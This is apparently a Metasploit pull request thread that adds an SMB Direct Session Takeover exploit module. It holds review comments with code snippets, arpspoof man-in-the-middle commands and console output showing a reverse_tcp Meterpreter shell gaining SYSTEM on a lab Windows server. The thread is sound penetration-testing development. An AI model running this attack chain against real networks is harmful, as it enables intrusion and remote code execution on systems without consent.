Add SMB Shadow Module: Direct SMB Session Takeover
rapid7/metasploit-framework pull request #15903
Opened 2021-11-24 23:42 UTC by usiegl00

## This module intercepts direct SMB connections on the LAN
Both the SMB Server and Client must be on the LAN.
The SMB Client must be authenticating to the Server as an Administrator.
This module is dependent on an external ARP spoofer.
The builtin ARP spoofer was not providing sufficient host discovery.
[Bettercap v1.6.2](https://github.com/picatz/bettercap) was used during the development of this module.

## Verification Steps

1. Ensure Windows SMB Client and Server are on the LAN
2. Run bettercap targeting both the SMB Client and Server
3. Start msfconsole
4. Do `use exploit/windows/smb/smb_shadow`
5. Do `run`
6. Make the SMB Client connect to the SMB Server as an Administrator
7. Receive a Meterpreter Session as SYSTEM on the SMB Server host

See the paper on the SMB Shadow Attack:
https://strontium.io/blog/introducing-windows-10-smb-shadow-attack

SideNote -- The [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions) mentions the [BailiWicked module](https://www.rapid7.com/db/modules/auxiliary/spoof/dns/bailiwicked_domain/), which has a spelling error. (Baliwicked)

2021-12-02 15:34 UTC, adfoster-r7 requested changes
Thanks for the pull request! Added some comments that would be useful to implement :+1:

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +        @sessions[packet.tcp_header.tcp_src][:acknum] = packet.tcp_header.tcp_ack
Is there a potential of race conditions here? i.e. if multiple threads are modifying/reading the same `@sessions` state - would we need to place a mutex/semaphore around these reads/writes to eliminate race conditions

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      raise "Access Denied."
The `fail_with` pattern mentioned above might be useful here too :+1:

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    #raise "ERROR : Unable to retrieve Gateway mac address: #{@gateip4}" unless @gatemac && @gatemac.class == String
The `fail_with` pattern mentioned above might be useful here too :+1:

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +  end
Since there's the potential of races/fail_with calls here, can we add an ensure for the cleanup mechanism to always happen :+1:

```suggestion
    main_capture
  ensure
     cleanup
  end
```

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      raise "Access Denied."
Is it possible to enhance this error message with the `nt_status` code, I believe this should work (not tested):

```suggestion
      fail_with(Failure::UnexpectedReply, "Unexpected tree connect response #{e.status_code.value.inspect} (#{ ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first || 'unknown' })) 
```

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +  end
It might be possible to use some of Framework's existing helpers for this, i.e. Rex Socket's itoa etc:

https://github.com/rapid7/rex-socket/blob/9785327a8cb382ada7555206e73685e57b3d35b3/lib/rex/socket/range_walker.rb#L151

There's other helpers in that file that may be usable too:
https://github.com/rapid7/rex-socket/blob/9785327a8cb382ada7555206e73685e57b3d35b3/lib/rex/socket.rb#L336

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +          'StackAdjustment' => -3500,
Just confirming - are these values are required, or were they transferred from an existing module? 👀

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      IO.popen("pfctl -f -", "r+", err: "/dev/null") do |pfctl|
Because of the side effects on the system itself, we may want to add the `DefangedMode` option being set to `true` before we run this module, as it's modifying ip tables etc

Pattern can be seen over here:
https://github.com/rapid7/metasploit-framework/blob/db2ac2d4c136c42a09d08716aad163156887744b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb#L152-L164

Note, the wording would be updated to align with the needs of this module

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    @interface = datastore['INTERFACE'] || Pcap.lookupdev
I'd be in favor of not defaulting the interface here, and marking as explicitly required within the module options, just to remove any unexpected behavior:

```ruby
    register_options(
      [
        OptString.new('SHARE',    [ true, "The share to connect to", 'ADMIN$' ]),
        OptString.new('INTERFACE', [true, 'The name of the interface']),
```

2021-12-02 15:34 UTC, adfoster-r7 commented on documentation/modules/exploit/windows/smb/smb_shadow.md
> +6. Receive a Meterpreter Session as SYSTEM on the SMB Server host
It would be great to see add the verification steps / options to these docs :+1:

https://github.com/rapid7/metasploit-framework/blob/db2ac2d4c136c42a09d08716aad163156887744b/documentation/modules/auxiliary/scanner/smb/smb_ms17_010.md#verification-steps

2021-12-02 15:34 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      'Name'           => 'Microsoft Windows SMB Direct Session Takeover',
What are your thoughts on renaming the file from `smb_shadow.rb` to align closer with this name? Just to avoid confusion with other `shadow` techniques/tools in the windows ecosystem

2021-12-02 19:27 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +        packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac])
During testing, this statement failed due to `@sessions[packet.tcp_header.tcp_src][:dstmac]` being `nil`. In my understanding, this variable is set in separate thread in `start_syn_capture`. I think there is a race condition issue here, confirming what @adfoster-r7 said in this [comment](https://github.com/rapid7/metasploit-framework/pull/15903/files?authenticity_token=3xtKVY3FDLH5%2F8ll1LY8WkI6UbKrFdjA0gQIsIZtbdJmRtxiBeQvpDqzri235yVxqJLVrNbzTrgxZdsJwdlI8g%3D%3D&file-filters%5B%5D=.rb#r761178095). I could fix the issue by adding a retry in a rescue block. Note that it is not a solution and proper synchronisation (mutex) should be put in place instead:
```ruby
begin
  packet.eth_header.eth_dst = str2mac(@sessions[packet.tcp_header.tcp_src][:dstmac])
rescue => e
  sleep 0.1
  retry
end
```

2021-12-02 20:20 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +        @sessions[packet.tcp_header.tcp_src][:dstmac] = arp(tpa: ip2str(int2ip(packet.ip_header.ip_dst)))
I was not able to make this exploit work as expected until I found that, at some point, the client was communicating with the server directly, without passing through my machine. Apparently, the ARP spoofing attack was not properly working. After a bit of investigation, I found out this ARP request was the issue.

The ARP spoofing attack, which is running in the background, keeps sending broadcast requests, telling the client that the server is at the attacker MAC address. But, since this ARP request sent in `start_syn_capture` is asking "Who has [server IP]?", the server immediately replies with its MAC address (the legitimate one). At this point, the client sees this reply and automatically updates its ARP table to replace the poisoned value with the legitimate one. The server IP now matches its real MAC address and the MiMT attack fails, until the ARP spoofing tool sends a new poisoned broadcast request. This short change in the client ARP table make the whole exploit fails.

In order to confirm my assumption, I tried to bypass this ARP request and hard-coded the server MAC address instead. The exploit worked again, pretty reliably actually.
```ruby
@sessions[packet.tcp_header.tcp_src][:dstmac] = '<server MAC addresse>'
```

2021-12-02 22:46 UTC, usiegl00 commented
Thank you all for the clear and informative reviews.

2021-12-02 22:48 UTC, usiegl00 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      'Name'           => 'Microsoft Windows SMB Direct Session Takeover',
How about `smb_takeover.rb`?

2021-12-02 22:56 UTC, usiegl00 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      %x{iptables -A INPUT -i #{@interface} -p tcp --destination-port 445 -j DROP}
Is there a builtin method I can use to check if a command is in the path?

2021-12-02 23:30 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    @syn_capture_thread = Thread.new {
Example: https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/lib/rex/proto/proxy/socks4a.rb#L168

2021-12-02 23:38 UTC, adfoster-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      %x{iptables -A INPUT -i #{@interface} -p tcp --destination-port 445 -j DROP}
A similar approach to this should work :+1:

https://github.com/rapid7/metasploit-framework/blob/f1b77e24f394a311f32784164fb8d6b4d094da61/lib/msf/ui/console/command_dispatcher/db.rb#L1641-L1648

https://github.com/rapid7/metasploit-framework/blob/f1b77e24f394a311f32784164fb8d6b4d094da61/lib/msf/ui/console/command_dispatcher/db.rb#L1582-L1584

2021-12-06 15:41 UTC, cdelafuente-r7 reviewed
Thanks for updating the code @usiegl00. I re-tested the module and it works great!

I just left a few comments related to other minor code changes. Also, I added a design suggestion about how RubySMB is used in your module. Please, let me know what you think about it.

2021-12-06 15:59 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +    print_status 'Cleaned Up.'
I think the cleanup method should also remove the firewall rules (if any) to revert any changes made to the user's system.

2021-12-06 23:46 UTC, usiegl00 commented on modules/exploits/windows/smb/smb_shadow.rb
> +            smb_packet = RubySMB::SMB2::Packet::NegotiateRequest.read(smb2)
That is a great idea.
I will open a pr with a new dispatcher for ruby_smb after this pr is merged.
We can also add the missing DCERPC packets.
Once the new pr is merged, I will update this module to utilize it.

2021-12-15 00:38 UTC, usiegl00 commented
Just checking in. : )
Let me know if I can help get this across the line.

Happy Holidays!

2021-12-27 14:49 UTC, cdelafuente-r7 reviewed
Thanks for updating the code @usiegl00. I'm sorry for the delay.
I left a couple of comments about the use of `pfctl` on Mac. Otherwise, it looks good.

Do you still plan to add the suggested RubySMB dispatcher logic? If so, this should be added directly to this module (in this PR), since it is very specific to it. Only the new DCERPC packet in [svcctl.rb](https://github.com/rapid7/ruby_smb/blob/master/lib/ruby_smb/dcerpc/svcctl.rb) can be added to the RubySMB library later, if you choose to do so.

Happy Holidays too!

2021-12-27 14:49 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      IO.popen("#{pfctl} -f -", 'r+', err: '/dev/null') do |pf|
Apparently, using `-f` flushes the existing rules before adding this new rule. This is the warning I had on Mac OS X:
```
pfctl: Use of -f option, could result in flushing of rules
present in the main ruleset added by the system at startup.
See /etc/pf.conf for further details.
...
```
I checked and confirmed the original rules were gone.

Whenever possible, we need to make sure the packet filter behavior remains the same and only the needed rule should be added.

2021-12-27 14:49 UTC, cdelafuente-r7 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      IO.popen("#{pfctl} -d", err: '/dev/null').close
According to the documentation, `pfctl -d` only disables the packet filter. The added rule is not deleted. We need to make sure the original state is restored. This also includes the state of the packet filter. If it was originally enabled, it must stay enabled. Only the new rule should be deleted.

2021-12-28 11:05 UTC, usiegl00 commented on modules/exploits/windows/smb/smb_shadow.rb
> +      IO.popen("#{pfctl} -f -", 'r+', err: '/dev/null') do |pf|
I will use a [packet filter anchor](https://www.openbsd.org/faq/pf/anchors.html) to make sure the changes are isolated.

2021-12-28 11:55 UTC, usiegl00 commented
I suggest this pr be merged as is. The dispatcher work will go into a future pr.

(Thank you for reviewing my work. This is my first substantial msf contribution and I would enjoy a quick chat to share context on my interests. See email.)

2022-01-07 15:58 UTC, merged

2022-01-07 16:26 UTC, cdelafuente-r7 commented
Thank you @usiegl00  for this great module! I retested everything using the following environment:
- client: Windows 10
- server: Windows Server 2016
- attacker (MiTM): Kali Linux

I also used the `arpspoof` utility for the MiTM attack and let the module intercept traffic between the client and the server: 
`arpspoof -i <interface> -t <client IP> <server IP>`
`arpspoof -i <interface> -t <server IP> <client IP>`

I successfully got a Meterpreter session and verified the cleanup was done. I went ahead land it.

- Example output:
```
msf6 exploit(windows/smb/smb_shadow) > options 

Module options (exploit/windows/smb/smb_shadow):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DefangedMode  false            yes       Run in defanged mode
   DisableFwd    true             yes       Disable packet forwarding on port 445
   INTERFACE     eth0             yes       The name of the interface
   SHARE         ADMIN$           yes       The share to connect to


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.21  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/smb_shadow) > run

[*] Started reverse TCP handler on 192.168.2.21:4444 
[+] INFO : Warming up...
[*] Self: 192.168.2.21 | bb:aa:cc:11:22:33
[+] INFO : Packet forwarding on port 445 disabled.
[*] INFO : This module must be run alongside an arp spoofer / poisoner.
[*] INFO : The arp spoofer used during the testing of this module is bettercap v1.6.2.
[*] Connecting to the defined share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Created \PZijpQLG.exe...
[*] Connecting to the Service Control Manager...
[*] Creating a new service...
[*] Closing service handle...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \PZijpQLG.exe...
[*] Sending stage (175174 bytes) to 192.168.2.22
[*] Meterpreter session 1 opened (192.168.2.21:4444 -> 192.168.2.22:49678 ) at 2022-01-07 10:00:02 -0500
^C[*] Cleaning Up...
[+] INFO : Packet forwarding on port 445 reset.
[*] Cleaned Up.
[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(windows/smb/smb_shadow) > sessions

Active sessions
===============

  Id  Name  Type                     Information                       Connection
  --  ----  ----                     -----------                       ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN2016SQL  192.168.2.21:4444 -> 192.168.2.22:496
                                                                       78  (192.168.2.22)

msf6 exploit(windows/smb/smb_shadow) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : WIN2016SQL
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 7
Meterpreter     : x86/windows
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
```

2022-01-07 16:55 UTC, cdelafuente-r7 commented
# Release Notes
This adds a new exploit module that implements the Shadow Attack, SMB Direct Session takeover. Before running this module, a MiTM attack needs to be performed to let it intercept SMB authentication requests between a client and a server. This can be done by using any kind of ARP spoofer/poisoner tools in addition to Metasploit. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload.